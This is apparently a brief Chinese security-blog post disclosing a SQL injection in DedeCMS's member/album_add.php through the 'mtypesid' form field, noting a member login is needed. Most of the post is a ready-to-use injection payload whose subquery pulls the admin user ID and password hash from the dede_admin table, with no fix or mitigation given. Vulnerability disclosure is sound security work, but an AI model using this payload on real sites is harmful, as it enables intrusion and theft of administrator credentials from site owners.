dedecms(织梦系统)album_add.php sql注入漏洞

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

漏洞需要会员,所以比较鸡肋啦
发表文章处,post表单的mtypesid可以注入
/dedecmsnew/member/album_add.php
注入POC: mtypesid=1′),(“‘”,’0′,’1367930810′,’p’,’0′,’2′,’-1′,’0′,’0′,(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid=’admin’),”,”,’12333′,”,”,’1367930810′,’1367930810′,’4′,’image’,’test’,’3′)#@`’`’20131008112026447

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3505.html